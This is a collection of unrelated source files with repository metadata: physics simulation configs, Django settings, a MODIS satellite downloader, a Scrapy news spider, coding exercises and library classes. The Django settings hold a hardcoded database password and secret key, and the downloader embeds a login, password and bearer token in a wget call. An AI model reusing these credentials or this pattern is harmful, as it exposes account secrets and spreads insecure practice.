process.load('SimG4CMS.HGCalTestBeam.HGCalTBCheckGunPosition_cfi')
process.load('SimG4CMS.HGCalTestBeam.HGCalTBAnalyzer_cfi')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(10)
)
if 'MessageLogger' in process.__dict__:
process.MessageLogger.categories.append('HGCSim')
process.MessageLogger.categories.append('HcalSim')
# Input source
process.source = cms.Source("EmptySource")
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('SingleMuonE200_cfi nevts:10'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.RAWSIMoutput = cms.OutputModule("PoolOutputModule",
SelectEvents = cms.untracked.PSet(
SelectEvents = cms.vstring('generation_step')
),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('GEN-SIM'),
filterName = cms.untracked.string('')
),
eventAutoFlushCompressedSize = cms.untracked.int32(5242880),
fileName = cms.untracked.string('file:gensim.root'),
outputCommands = process.RAWSIMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('TBGenSim.root')
)
# Other statements
process.genstepfilter.triggerConditions=cms.vstring("generation_step")
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc', '')
process.generator = cms.EDProducer("FlatRandomEThetaGunProducer",
AddAntiParticle = cms.bool(False),
PGunParameters = cms.PSet(
MinE = cms.double(99.99),
MaxE = cms.double(100.01),
MinTheta = cms.double(0.0),
MaxTheta = cms.double(0.0),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
PartID = cms.vint32(13)
),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1),
psethack = cms.string('single muon E 100')
)
process.VtxSmeared.MinZ = -800.0
process.VtxSmeared.MaxZ = -800.0
process.VtxSmeared.MinX = -7.5
process.VtxSmeared.MaxX = 7.5
process.VtxSmeared.MinY = -7.5
process.VtxSmeared.MaxY = 7.5
process.g4SimHits.HGCSD.RejectMouseBite = True
process.g4SimHits.HGCSD.RotatedWafer = True
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
HGCPassive = cms.PSet(
LVNames = cms.vstring('HGCalEE','HGCalHE','HGCalAH', 'CMSE'),
MotherName = cms.string('CMSE'),
),
type = cms.string('HGCPassive'),
)
)
process.HGCalTBAnalyzer.DoDigis = False
process.HGCalTBAnalyzer.DoRecHits = False
process.HGCalTBAnalyzer.UseFH = True
process.HGCalTBAnalyzer.UseBH = True
process.HGCalTBAnalyzer.UseBeam = True
process.HGCalTBAnalyzer.ZFrontEE = 1110.0
process.HGCalTBAnalyzer.ZFrontFH = 1172.3
process.HGCalTBAnalyzer.DoPassive = True
# Path and EndPath definitions
process.generation_step = cms.Path(process.pgen)
process.gunfilter_step = cms.Path(process.HGCalTBCheckGunPostion)
process.simulation_step = cms.Path(process.psim)
process.genfiltersummary_step = cms.EndPath(process.genFilterSummary)
process.analysis_step = cms.Path(process.HGCalTBAnalyzer)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.RAWSIMoutput_step = cms.EndPath(process.RAWSIMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.generation_step,
process.genfiltersummary_step,
process.simulation_step,
process.gunfilter_step,
process.analysis_step,
process.endjob_step,
process.RAWSIMoutput_step,
)
# filter all path with the production filter sequence
for path in process.paths:
getattr(process,path)._seq = process.generator * getattr(process,path)._seq
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
258ba757b7cd1250e8a2e1abe6391c275e180530 | 719fb168fdace7548c719a6d998b71bb15525d6c | /src/kinya/settings.py | baffe196271147d4a3a1787b16e0169cf7139ce7 | [] | no_license | nicpottier/kinya | 858b19f9d8891c4be80d8ecce477fbfd5c747a8e | e3f9ee774fcb00f916911df986f61e8f8a78f188 | refs/heads/master | 2016-09-05T21:18:03.141403 | 2011-05-23T18:19:20 | 2011-05-23T18:19:20 | 783,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,117 | py | # Django settings for kinya project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Nicolas Pottier', 'nicp@nyaruka.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'kinya',
'USER': 'kinya', # Not used with sqlite3.
'PASSWORD': 'murakoze', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../static')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/static/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 's7=@35q5k6wzfmrhn7=1l27s$z&0k&dawsuu65q2)i*^tb3rkvasdf'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'kinya.urls'
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../templates')
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'kinya.lessons',
)
| [
"nicpottier@gmail.com"
] | nicpottier@gmail.com |
453465980126de4e0addd9466aa1fb4eb7709d95 | 452b8b849e080cda5a26f4018cafa5a674ff7c20 | /froide/account/migrations/0003_auto_20160125_2127.py | 284973b0045128333fd564ec7053b4d1ea74536a | [
"MIT"
] | permissive | okffi/tietopyynto | 1262dcaf748c41b49be4a774be552fc75fc9b336 | 66b7e7dbf3c3395d79af3da85b3b58f01fad62dc | refs/heads/tietopyynto | 2021-01-17T21:07:04.829856 | 2016-10-30T19:26:53 | 2016-10-30T19:26:53 | 14,255,294 | 3 | 2 | MIT | 2021-01-05T11:51:18 | 2013-11-09T10:19:16 | Python | UTF-8 | Python | false | false | 688 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0002_auto_20150729_0828'),
]
operations = [
migrations.AddField(
model_name='user',
name='date_left',
field=models.DateTimeField(default=None, null=True, verbose_name='date left', blank=True),
),
migrations.AddField(
model_name='user',
name='is_deleted',
field=models.BooleanField(default=False, help_text='Designates whether this user was deleted.', verbose_name='deleted'),
),
]
| [
"mail@stefanwehrmeyer.com"
] | mail@stefanwehrmeyer.com |
6f40c592f87d09d6a2d046b25fabd3e80395a695 | 118984fdbacf5eb71159eb511ccd055987498886 | /CH11/EX11.38.py | a2c179da5ac2a5a4bd3de019820e3260ddb8588a | [] | no_license | 6igsm0ke/Introduction-to-Programming-Using-Python-Liang-1st-edtion | 321c6256be6ff78adbc8e3ddc73f2f43a51a75ab | 159489f3af296f87469ddddf3a1cb232917506b0 | refs/heads/master | 2023-06-05T20:03:17.951911 | 2021-06-18T18:04:42 | 2021-06-18T18:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | # 11.38 (Turtle: draw a polygon/polyline) Write the following functions that draw a
# polygon/polyline to connect all points in the list. Each element in the list is a list of
# two coordinates.
# # Draw a polyline to connect all the points in the list
# def drawPolyline(points):
# # Draw a polygon to connect all the points in the list and
# # close the polygon by connecting the first point with the last point
# def drawPolygon(points):
# # Fill a polygon by connecting all the points in the list
# def fillPolygon(points):
import turtle
# Draw a polyline to connect all the points in the list
def drawPolyline(points):
for i in range(len(points) - 1):
drawLine(points[i], points[i + 1])
# Draw a polygon to connect all the points in the list and
# close the polygon by connecting the first point with the last point
def drawPolygon(points):
drawPolyline(points)
drawLine(points[len(points) - 1], points[0]) # Close the polygon
# Fill a polygon by connecting all the points in the list
def fillPolygon(points):
turtle.begin_fill()
drawPolygon(points)
turtle.end_fill()
# Draw a line from (x1, y1) to (x2, y2)
def drawLine(x1, y1, x2, y2):
turtle.penup()
turtle.goto(x1, y1)
turtle.pendown()
turtle.goto(x2, y2)
points = input("Enter points: ").split()
points = [eval(p) for p in points]
drawPolygon(points) | [
"47993441+OmarAlmighty@users.noreply.github.com"
] | 47993441+OmarAlmighty@users.noreply.github.com |
10662b2839c963e9c42342a502361677ede604d6 | 104a0ec7cfb5d4bf948f22b47edb59122a886363 | /input/kinetics/families/intra_substitutionCS_cyclization/depository.py | d3a115a1158e51d03bfd7a044c1ccccb5d030255 | [] | no_license | nickvandewiele/RMG-database | 3afbe88df46a5641c6abbaf032bf4a0b6b9aae73 | dc3cbc7048501d730062426a65d87ea452e8705f | refs/heads/master | 2020-12-25T08:19:49.436773 | 2014-08-04T21:37:26 | 2014-08-04T21:37:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | #!/usr/bin/env python
# encoding: utf-8
name = "intra_substitutionCS_cyclization/depository"
shortDesc = u""
longDesc = u"""
"""
| [
"jwallen@mit.edu"
] | jwallen@mit.edu |
4b18e558dc27eafa6c869c000bf0f0e6270df667 | 19d47d47c9614dddcf2f8d744d883a90ade0ce82 | /pynsxt/swagger_client/models/lb_source_ip_persistence_profile.py | 3b76026eb4c6d08312a91366ab687f7d0bcdcb0c | [] | no_license | darshanhuang1/pynsxt-1 | 9ed7c0da9b3a64e837a26cbbd8b228e811cee823 | fb1091dff1af7f8b8f01aec715682dea60765eb8 | refs/heads/master | 2020-05-25T14:51:09.932853 | 2018-05-16T12:43:48 | 2018-05-16T12:43:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,200 | py | # coding: utf-8
"""
NSX API
VMware NSX REST API # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.lb_persistence_profile import LbPersistenceProfile # noqa: F401,E501
from swagger_client.models.resource_link import ResourceLink # noqa: F401,E501
from swagger_client.models.self_resource_link import SelfResourceLink # noqa: F401,E501
from swagger_client.models.tag import Tag # noqa: F401,E501
class LbSourceIpPersistenceProfile(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purge': 'str',
'ha_persistence_mirroring_enabled': 'bool',
'timeout': 'int'
}
attribute_map = {
'purge': 'purge',
'ha_persistence_mirroring_enabled': 'ha_persistence_mirroring_enabled',
'timeout': 'timeout'
}
def __init__(self, purge='FULL', ha_persistence_mirroring_enabled=False, timeout=300): # noqa: E501
"""LbSourceIpPersistenceProfile - a model defined in Swagger""" # noqa: E501
self._purge = None
self._ha_persistence_mirroring_enabled = None
self._timeout = None
self.discriminator = None
if purge is not None:
self.purge = purge
if ha_persistence_mirroring_enabled is not None:
self.ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
if timeout is not None:
self.timeout = timeout
@property
def purge(self):
"""Gets the purge of this LbSourceIpPersistenceProfile. # noqa: E501
persistence purge setting # noqa: E501
:return: The purge of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: str
"""
return self._purge
@purge.setter
def purge(self, purge):
"""Sets the purge of this LbSourceIpPersistenceProfile.
persistence purge setting # noqa: E501
:param purge: The purge of this LbSourceIpPersistenceProfile. # noqa: E501
:type: str
"""
allowed_values = ["NO_PURGE", "FULL"] # noqa: E501
if purge not in allowed_values:
raise ValueError(
"Invalid value for `purge` ({0}), must be one of {1}" # noqa: E501
.format(purge, allowed_values)
)
self._purge = purge
@property
def ha_persistence_mirroring_enabled(self):
"""Gets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
Persistence entries are not synchronized to the HA peer by default. # noqa: E501
:return: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: bool
"""
return self._ha_persistence_mirroring_enabled
@ha_persistence_mirroring_enabled.setter
def ha_persistence_mirroring_enabled(self, ha_persistence_mirroring_enabled):
"""Sets the ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile.
Persistence entries are not synchronized to the HA peer by default. # noqa: E501
:param ha_persistence_mirroring_enabled: The ha_persistence_mirroring_enabled of this LbSourceIpPersistenceProfile. # noqa: E501
:type: bool
"""
self._ha_persistence_mirroring_enabled = ha_persistence_mirroring_enabled
@property
def timeout(self):
"""Gets the timeout of this LbSourceIpPersistenceProfile. # noqa: E501
When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time. # noqa: E501
:return: The timeout of this LbSourceIpPersistenceProfile. # noqa: E501
:rtype: int
"""
return self._timeout
@timeout.setter
def timeout(self, timeout):
"""Sets the timeout of this LbSourceIpPersistenceProfile.
When all connections complete (reference count reaches 0), persistence entry timer is started with the expiration time. # noqa: E501
:param timeout: The timeout of this LbSourceIpPersistenceProfile. # noqa: E501
:type: int
"""
if timeout is not None and timeout < 1: # noqa: E501
raise ValueError("Invalid value for `timeout`, must be a value greater than or equal to `1`") # noqa: E501
self._timeout = timeout
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LbSourceIpPersistenceProfile):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"tcraft@pivotal.io"
] | tcraft@pivotal.io |
974266c40be29c89c2283e836d50a53fbe2b5395 | bee77315d08def61c1155930285211ef3d8d7654 | /nevergrad/functions/olympussurfaces/core.py | 978320088ddd141745feb7073f77e1a0df4ec471 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | facebookresearch/nevergrad | d2da592c1bf3b7c398392b3d39217a3753a4912c | daddb18184bf64ba9082ecc55a56e07429a23103 | refs/heads/main | 2023-09-04T10:53:42.903505 | 2023-08-30T17:10:37 | 2023-08-30T17:10:37 | 158,468,845 | 3,526 | 367 | MIT | 2023-09-11T13:37:36 | 2018-11-21T00:33:17 | Python | UTF-8 | Python | false | false | 4,355 | py | # Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Based on https://github.com/aspuru-guzik-group/olympus
import numpy as np
from functools import partial
from nevergrad.parametrization import parameter as p
from ..base import ExperimentFunction
import nevergrad as ng
class OlympusSurface(ExperimentFunction):
SURFACE_KINDS = (
"Michalewicz",
"AckleyPath",
"Dejong",
"HyperEllipsoid",
"Levy",
"Michalewicz",
"Rastrigin",
"Rosenbrock",
"Schwefel",
"StyblinskiTang",
"Zakharov",
"DiscreteAckley",
"DiscreteDoubleWell",
"DiscreteMichalewicz",
"LinearFunnel",
"NarrowFunnel",
"GaussianMixture",
)
def __init__(
self, kind: str, dimension: int = 10, noise_kind: str = "GaussianNoise", noise_scale: float = 1
) -> None:
self.kind = kind
self.param_dim = dimension
self.noise_kind = noise_kind
assert self.kind in OlympusSurface.SURFACE_KINDS
assert self.noise_kind in ["GaussianNoise", "UniformNoise", "GammaNoise"]
self.noise_scale = noise_scale
self.surface = partial(self._simulate_surface, noise=True)
self.surface_without_noise = partial(self._simulate_surface, noise=False)
parametrization = p.Array(shape=(dimension,))
parametrization.function.deterministic = False
super().__init__(self.surface, parametrization)
self.shift = self.parametrization.random_state.normal(size=self.dimension)
def _simulate_surface(self, x: np.ndarray, noise: bool = True) -> float:
try:
from olympus.surfaces import import_surface # pylint: disable=import-outside-toplevel
from olympus import noises
except ImportError as e:
raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
if noise:
noise = noises.Noise(kind=self.noise_kind, scale=self.noise_scale)
surface = import_surface(self.kind)(param_dim=self.param_dim, noise=noise)
else:
surface = import_surface(self.kind)(param_dim=self.param_dim)
return surface.run(x - self.shift)[0][0]
def evaluation_function(self, *recommendations) -> float:
"""Averages multiple evaluations if necessary"""
x = recommendations[0].value
return self.surface_without_noise(x - self.shift)
class OlympusEmulator(ExperimentFunction):
DATASETS = (
"suzuki",
"fullerenes",
"colors_bob",
"photo_wf3",
"snar",
"alkox",
"benzylation",
"photo_pce10",
"hplc",
"colors_n9",
)
def __init__(self, dataset_kind: str = "alkox", model_kind: str = "NeuralNet") -> None:
self.dataset_kind = dataset_kind
self.model_kind = model_kind
assert self.dataset_kind in OlympusEmulator.DATASETS
assert self.model_kind in ["BayesNeuralNet", "NeuralNet"]
parametrization = self._get_parametrization()
parametrization.function.deterministic = False
parametrization.set_name("")
super().__init__(self._simulate_emulator, parametrization)
def _get_parametrization(self) -> p.Parameter:
try:
from olympus.datasets import Dataset # pylint: disable=import-outside-toplevel
except ImportError as e:
raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
dataset = Dataset(self.dataset_kind)
dimension = dataset.shape[1] - 1
bounds = list(zip(*dataset.param_space.param_bounds))
return p.Array(shape=(dimension,), lower=bounds[0], upper=bounds[1])
def _simulate_emulator(self, x: np.ndarray) -> float:
try:
from olympus import Emulator # pylint: disable=import-outside-toplevel
except ImportError as e:
raise ng.errors.UnsupportedExperiment("Please install olympus for Olympus experiments") from e
emulator = Emulator(dataset=self.dataset_kind, model=self.model_kind)
return emulator.run(x)[0][0] * (-1 if emulator.get_goal() == "maximize" else 1)
| [
"noreply@github.com"
] | facebookresearch.noreply@github.com |
6494aa421e2601435495170fd63e0de75337f754 | c917004bdd665903338c3115bd6821fc7208242b | /workspace/Python3_Lesson12/src/addressbook.py | 72c17c0ef0d93d7f176663ab385f23b973ae1786 | [] | no_license | paulrefalo/Python-2---4 | 408ad018ccc8161b801031f8d15df2154c5d25cb | 049c654ed626e97d7fe2f8dc61d84c60f10d7558 | refs/heads/master | 2021-01-10T05:30:25.502795 | 2016-02-19T02:08:39 | 2016-02-19T02:08:39 | 52,054,382 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,734 | py | import configparser
from optparse import OptionParser
import shelve
config = configparser.RawConfigParser()
config.read('V:/workspace/Python3_Lesson12/src/addressbook.cfg')
shelf_location = config.get('database', 'file')
class InvalidEmail(Exception):
pass
def validate_email(email):
if '@' not in email:
raise InvalidEmail("Invalid email: "+email)
def email_add(email):
validate_email(email)
shelf = shelve.open(shelf_location)
if 'emails' not in shelf:
shelf['emails'] = []
emails = shelf['emails']
if email in emails:
message = False, 'Email "%s" already in address book' % email
else:
emails.append(email)
message = True, 'Email "%s" added to address book' % email
shelf['emails'] = emails
shelf.close()
return message
def email_delete(email):
validate_email(email)
shelf = shelve.open(shelf_location)
if 'emails' not in shelf:
shelf['emails'] = []
emails = shelf['emails']
try:
emails.remove(email)
message = True, 'Email "%s" removed from address book' % email
except ValueError:
message = False, 'Email "%s" was not in the address book' % email
shelf['emails'] = emails
shelf.close()
return message
def email_display():
shelf = shelve.open(shelf_location)
emails = shelf['emails']
shelf.close()
text = ''
for email in emails:
text += email + '\n'
return True,text
def main(options):
"routes requests"
if options.action == 'add':
return email_add(options.email)
elif options.action == 'delete':
return email_delete(options.email)
elif options.display == True:
return email_display()
if __name__ == '__main__':
shelf = shelve.open(shelf_location)
if 'emails' not in shelf:
shelf['emails'] = []
shelf.close()
parser = OptionParser()
parser.add_option('-a', '--action', dest="action", action="store",
help="requires -e option. Actions: add/delete")
parser.add_option('-e', '--email', dest="email",
action="store", help="email used in the -a option")
parser.add_option('-d', '--display', dest="display", action="store_true",
help="show all emails")
(options, args) = parser.parse_args()
#validation
if options.action and not options.email:
parser.error("option -a requires option -e")
elif options.email and not options.action:
parser.error("option -e requires option -a")
try:
print(main(options)[1])
except InvalidEmail:
parser.error("option -e requires a valid email address") | [
"paul.refalo@gmail.com"
] | paul.refalo@gmail.com |
a76ce56f356f65611bcc9250aa5fdc250c9b10f9 | 0049832c5cbee4b96189b88b51653f48decde596 | /MODIS/MOD05/downloaderv2.py | eb85762e6a024cad9673678041edb0e2a034fbf1 | [] | no_license | henockmamo54/ImageFusion | 18cf27ec4a066456c0d575696fc986814d10a7e6 | 07e88b5cb1925f54b3b3659caa2abda2bf4f3a72 | refs/heads/master | 2023-06-16T12:38:07.352623 | 2021-07-19T00:52:02 | 2021-07-19T00:52:02 | 355,720,494 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 13 10:34:52 2021
@author: Henock
"""
import os
import modapsclient
from datetime import datetime
username = "hiik324"
password = "Ecology123"
startdate="2019-08-01"
enddate="2019-12-01"
north="38.22346787684907"
south="38.18195837298332"
west="127.21710138948873"
east="127.27222505323994"
product="MOD05_L2"
collection="61"
startdate_obj = datetime.strptime(startdate, '%Y-%m-%d')
path = os.path.join("./",str(startdate_obj.year))
if not os.path.exists(path):
os.mkdir(path)
a = modapsclient.ModapsClient()
products=a.searchForFiles(products=product, startTime=startdate,
endTime=enddate, north=north,south=south,
west=west,east=east, collection=collection)
print("Products count = > ",len(products))
for p in products:
url=a.getFileUrls(p)[0]
print(p,url)
cmd=('wget --user hiik324 --password Ecology123 {0} --header "Authorization: Bearer C88B2F44-881A-11E9-B4DB-D7883D88392C" -P {1} '.format( url, path))
os.system(cmd)
| [
"henockmamo54@gmail.com"
] | henockmamo54@gmail.com |
db6863c444c7ed992ab0de7afba38e1d1466433d | 0d982772c792460c3f09da170fe80b67336bd5c5 | /nsweb/controllers/analyze.py | 83611ce625aa5f6c1c62ff9f7402e909bdacada6 | [] | no_license | tziembo/neurosynth-web | bf31c3d66fe78fc908778857ebc500440a022f2e | 8642e490ab910665d8be9b3271260dec59e0c4b2 | refs/heads/master | 2021-06-27T05:50:56.512331 | 2017-08-22T05:46:51 | 2017-08-22T05:46:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,004 | py | from flask import Blueprint, render_template, redirect, url_for, request, jsonify, abort, send_file
from nsweb.models.analyses import Analysis, AnalysisImage
from nsweb.core import app, add_blueprint, db
from nsweb.initializers import settings
from nsweb.tasks import run_metaanalysis
from nsweb.controllers.images import send_nifti
from flask.helpers import url_for
import simplejson as json
from flask.ext.user import login_required, current_user
import re
import uuid
import requests
from os.path import join, basename, exists
import os
from datetime import datetime
from email.utils import parsedate
bp = Blueprint('analyze',__name__,url_prefix='/analyze')
@bp.route('/', methods=['GET'])
def index():
return render_template('analyze/index.html.slim')
@bp.route('/<id>/', methods=['GET', 'POST'])
def show(id):
return render_template('analyze/show.html.slim')
@login_required
def run():
if 'ids' not in request.args:
abort(404) # TODO: return sensible error message
result = run_metaanalysis.delay(request.args['ids']).wait()
if result:
# Create the Analysis record
uid = uuid.uuid4().hex
name = request.args.get('name', None)
description = request.args.get('description', None)
analysis = Analysis(name=request.args['name'], description=description,
uuid=uid, ip=request.remote_addr, user=current_user)
# Add images
image_dir = join(settings.IMAGE_DIR, 'analyses')
analysis.images = [
AnalysisImage(image_file=join(image_dir, name + '_pAgF_z_FDR_0.01.nii.gz'),
label='%s: forward inference' % name,
stat='z-score',
display=1,
download=1),
AnalysisImage(image_file=join(image_dir, name + '_pFgA_z_FDR_0.01.nii.gz'),
label='%s: reverse inference' % name,
stat='z-score',
display=1,
download=1)
]
db.session.add(analysis)
db.session.commit()
# Add studies
for s in ids:
db.session.add(Inclusion(analysis=analysis, study_id=int(s)))
db.session.commit()
@bp.route('/<id>/images')
### TODO: move image retrieval from multiple controllers into a separate helper
def get_images(id):
analysis = Analysis.query.filter_by(uuid=id).first()
if analysis is None:
abort(404)
images = [{
'id': img.id,
'name': img.label,
'colorPalette': 'red' if 'reverse' in img.label else 'blue',
# "intent": (img.stat + ':').capitalize(),
'url': '/images/%s' % img.id,
'visible': 1 if 'reverse' in img.label else 0,
'download': '/images/%s' % img.id,
'intent': 'z-score'
} for img in analysis.images if img.display]
return jsonify(data=images)
@bp.route('<id>/studies')
def get_studies(id):
analysis = Analysis.query.filter_by(uuid=id).first()
if analysis is None:
abort(404)
pass
| [
"tyarkoni@gmail.com"
] | tyarkoni@gmail.com |
2264537e226c42fd49c2db1e815b60de5324216e | eddb5cc6ece559a21fb2d99dc03fb4b9e3e1ddb0 | /fagaiwei/fagaiwei/spiders/41dagongwang_sipder.py | 5bd0eebebe50b1f5a487bf89305864a737b1af3a | [] | no_license | KKtoNN/python_spider | a9bdd005d607b1265a556cb4908e84804c0bfc62 | c72bd061c3ca4145fef85b0fd9c15576441cdb09 | refs/heads/master | 2020-03-18T22:50:00.131802 | 2018-05-30T00:47:56 | 2018-05-30T00:47:56 | 135,367,902 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,688 | py | # coding:utf-8
import re
import time
import scrapy
from fagaiwei.items import FagaiweiItem
from fagaiwei.settings import session, NewsItemInfo
from fagaiwei.keyword_others import keyword
class xiamenSipderSpider(scrapy.Spider):
name = 'dagongwang_sipder'
allowed_domains = ['takungpao.com']
start_urls = [
'http://news.takungpao.com/paper/list-{}.html'.format(time.strftime("%Y%m%d", time.localtime())),
]
def parse(self, response):
pub_title = '大公报'
data_tiitle = ''.join(list(response.xpath("//div[@class='pannel_inner01']/div//text()").getall())) \
.replace('/n', '')
web2 = 'http://news.takungpao.com.hk/paper/{}.html'.format(time.strftime("%Y%m%d", time.localtime()))
url2s = response.xpath("//a[@class ='bluelink']/text()").getall()
for url2 in url2s:
item = FagaiweiItem()
param = re.search(r'第(\w+)版', url2).group(1)
url = web2 + '?' + param
result = session.query(NewsItemInfo).filter_by(url=url, web_id=41).count()
if result:
# print("PDF 文件地址: {} 存在".format(url))
pass
else:
item['url'] = url
item['title'] = pub_title + data_tiitle + param
item['content'] = '该页面为电子版报纸请点原链接查看'
item['web'] = response.url
item['webname'] = pub_title
item['pub_time'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
item["keyword"] = keyword.get_keyword(item["content"])
item['web_id'] = 41
yield item
| [
"18835702864@163.com"
] | 18835702864@163.com |
3cdc5787adb3028825634d327fdb2d2aa36b91b5 | 5a61ba76c770de8469218ff457213e122e08c7d1 | /code/leetcode/dynamic_programming/Solution123.py | fc2166197c3a360720c261e79b56f0cb65a9bd9a | [
"Apache-2.0"
] | permissive | zhangrong1722/interview | 6a71af26f08f036a294e36073cb9eb6ca798b993 | 187a485de0774561eb843d8ee640236adda97b90 | refs/heads/master | 2020-09-06T08:15:00.229710 | 2019-12-10T06:32:05 | 2019-12-10T06:32:05 | 220,372,777 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | class Solution:
def maxProfit(self, prices):
"""
Considering the fact we may complete at most two transactions.We can assume that first transaction is finished at i-th element.
And we just need to cosider the subarry [:i] abd [i+1: lens],where the former and the latter represent the max value for subarray[:i] and subarray[i+1:len(prices)-1]
:type prices: List[int]
:rtype: int
reference: https://leetcode.com/problems/best-time-to-buy-and-sell-stock-iii/discuss/200126/simple-c%2B%2B-DP-beats-99.66-with-explanation
"""
if len(prices) <= 1:
return 0
left = [0] * len(prices)
right = [0] * len(prices)
min_prices, max_prices = prices[0], prices[-1]
for i in range(1, len(prices)):
min_prices = min(min_prices, prices[i])
left[i] = max(prices[i]-min_prices, left[i-1])
for j in range(len(prices)-2, -1, -1):
max_prices = max(max_prices, prices[j])
right[j] = max(max_prices - prices[j], right[j+1])
results = [left[i]+right[i] for i in range(len(prices))]
return max(results) | [
"1922525328@qq.com"
] | 1922525328@qq.com |
